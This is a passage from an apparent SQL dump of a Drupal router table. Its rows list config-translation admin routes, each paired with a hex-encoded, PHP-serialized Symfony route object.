0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37323a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f7b636f6e746163745f666f726d7d2f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35373a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e45646974466f726d223b733a393a22706c7567696e5f6964223b733a31323a22636f6e746163745f666f726d223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a22636f6e746163745f666f726d223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a636f6e746163745f666f726d223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31323a22636f6e746163745f666f726d223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39393a227b5e2f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f283f503c636f6e746163745f666f726d3e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a22636f6e746163745f666f726d223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31323a22636f6e746163745f666f726d223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a35303a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f252f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('config_translation.item.edit.entity.date_format.edit_form', '/admin/config/regional/date-time/formats/manage/{date_format}/translate/{langcode}/edit', '/admin/config/regional/date-time/formats/manage/%/translate/%/edit', 1013, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38373a222f61646d696e2f636f6e6669672f726567696f6e616c2f646174652d74696d652f666f726d6174732f6d616e6167652f7b646174655f666f726d61747d2f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35373a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e45646974466f726d223b733a393a22706c7567696e5f6964223b733a31313a22646174655f666f726d6174223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31313a22646174655f666f726d6174223b613a323a7b733a343a2274797065223b733a31383a22656e746974793a646174655f666f726d6174223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31313a22646174655f666f726d6174223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131353a227b5e2f61646d696e2f636f6e6669672f726567696f6e616c2f646174655c2d74696d652f666f726d6174732f6d616e6167652f283f503c646174655f666f726d61743e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a22646174655f666f726d6174223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a34373a222f61646d696e2f636f6e6669672f726567696f6e616c2f646174652d74696d652f666f726d6174732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31313a22646174655f666f726d6174223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a313031333b733a31343a227061747465726e4f75746c696e65223b733a36363a222f61646d696e2f636f6e6669672f726567696f6e616c2f646174652d74696d652f666f726d6174732f6d616e6167652f252f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a31303b7d7d, 10),
('config_translation.item.edit.entity.entity_form_mode.edit_form', '/admin/structure/display-modes/form/manage/{entity_form_mode}/translate/{langcode}/edit', '/admin/structure/display-modes/form/manage/%/translate/%/edit', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38373a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f666f726d2f6d616e6167652f7b656e746974795f666f726d5f6d6f64657d2f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35373a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e45646974466f726d223b733a393a22706c7567696e5f6964223b733a31363a22656e746974795f666f726d5f6d6f6465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31363a22656e746974795f666f726d5f6d6f6465223b613a323a7b733a343a2274797065223b733a32333a22656e746974793a656e746974795f666f726d5f6d6f6465223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31363a22656e746974795f666f726d5f6d6f6465223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131353a227b5e2f61646d696e2f7374727563747572652f646973706c61795c2d6d6f6465732f666f726d2f6d616e6167652f283f503c656e746974795f666f726d5f6d6f64653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31363a22656e746974795f666f726d5f6d6f6465223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a34323a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f666f726d2f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31363a22656e746974795f666f726d5f6d6f6465223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a36313a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f666f726d2f6d616e6167652f252f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.edit.entity.entity_view_mode.edit_form', '/admin/structure/display-modes/view/manage/{entity_view_mode}/translate/{langcode}/edit', '/admin/structure/display-modes/view/manage/%/translate/%/edit', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38373a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f766965772f6d616e6167652f7b656e746974795f766965775f6d6f64657d2f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35373a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e45646974466f726d223b733a393a22706c7567696e5f6964223b733a31363a22656e746974795f766965775f6d6f6465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31363a22656e746974795f766965775f6d6f6465223b613a323a7b733a343a2274797065223b733a32333a22656e746974793a656e746974795f766965775f6d6f6465223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31363a22656e746974795f766965775f6d6f6465223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131353a227b5e2f61646d696e2f7374727563747572652f646973706c61795c2d6d6f6465732f766965772f6d616e6167652f283f503c656e746974795f766965775f6d6f64653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31363a22656e746974795f766965775f6d6f6465223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a34323a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f766965772f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31363a22656e746974795f766965775f6d6f6465223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a36313a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f766965772f6d616e6167652f252f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.edit.entity.field_config.block_content_field_edit_form', '/admin/structure/block-content/manage/{block_content_type}/fields/{field_config}/translate/{langcode}/edit', '/admin/structure/block-content/manage/%/fields/%/translate/%/edit', 981, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a3130363a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f6669656c64732f7b6669656c645f636f6e6669677d2f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35373a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e45646974466f726d223b733a393a22706c7567696e5f6964223b733a32303a22626c6f636b5f636f6e74656e745f6669656c6473223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a226669656c645f636f6e666967223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a6669656c645f636f6e666967223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3134343a227b5e2f61646d696e2f7374727563747572652f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b292f6669656c64732f283f503c6669656c645f636f6e6669673e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a373a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a226669656c645f636f6e666967223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f6669656c6473223b7d693a353b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a363b613a323a7b693a303b733a343a2274657874223b693a313b733a33373a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3938313b733a31343a227061747465726e4f75746c696e65223b733a36353a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f252f6669656c64732f252f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a31303b7d7d, 10),
('config_translation.item.edit.entity.field_config.block_content_field_edit_form.bc', '/admin/structure/block/block-content/manage/{block_content_type}/fields/{field_config}/translate/{langcode}/edit', '/admin/structure/block/block-content/manage/%/fields/%/translate/%/edit', 2005, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a3131323a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f6669656c64732f7b6669656c645f636f6e6669677d2f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a393a22706c7567696e5f6964223b733a32303a22626c6f636b5f636f6e74656e745f6669656c6473223b733a31313a225f636f6e74726f6c6c6572223b733a38313a225c44727570616c5c626c6f636b5f636f6e74656e745c436f6e74726f6c6c65725c426c6f636b436f6e74656e74436f6e74726f6c6c65723a3a626c6f636b436f6e74656e74547970655265646972656374223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a226669656c645f636f6e666967223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a6669656c645f636f6e666967223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3135303a227b5e2f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b292f6669656c64732f283f503c6669656c645f636f6e6669673e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a373a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a226669656c645f636f6e666967223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f6669656c6473223b7d693a353b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a363b613a323a7b693a303b733a343a2274657874223b693a313b733a34333a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a323030353b733a31343a227061747465726e4f75746c696e65223b733a37313a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f252f6669656c64732f252f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a31313b7d7d, 11),
('config_translation.item.edit.entity.field_config.comment_field_edit_form', '/admin/structure/comment/manage/{comment_type}/fields/{field_config}/translate/{langcode}/edit', '/admin/structure/comment/manage/%/fields/%/translate/%/edit', 981, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a39343a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f7b636f6d6d656e745f747970657d2f6669656c64732f7b6669656c645f636f6e6669677d2f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35373a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e45646974466f726d223b733a393a22706c7567696e5f6964223b733a31343a22636f6d6d656e745f6669656c6473223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a226669656c645f636f6e666967223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a6669656c645f636f6e666967223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a31323a22636f6d6d656e745f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3133313a227b5e2f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f283f503c636f6d6d656e745f747970653e5b5e2f5d2b2b292f6669656c64732f283f503c6669656c645f636f6e6669673e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a373a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a226669656c645f636f6e666967223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f6669656c6473223b7d693a353b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a22636f6d6d656e745f74797065223b693a343b623a313b7d693a363b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a31323a22636f6d6d656e745f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3938313b733a31343a227061747465726e4f75746c696e65223b733a35393a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f252f6669656c64732f252f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a31303b7d7d, 10),
('config_translation.item.edit.entity.field_config.contact_message_field_edit_form', '/admin/structure/contact/manage/{contact_form}/fields/{field_config}/translate/{langcode}/edit', '/admin/structure/contact/manage/%/fields/%/translate/%/edit', 981, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a39343a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f7b636f6e746163745f666f726d7d2f6669656c64732f7b6669656c645f636f6e6669677d2f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35373a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e45646974466f726d223b733a393a22706c7567696e5f6964223b733a32323a22636f6e746163745f6d6573736167655f6669656c6473223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a226669656c645f636f6e666967223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a6669656c645f636f6e666967223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a31323a2263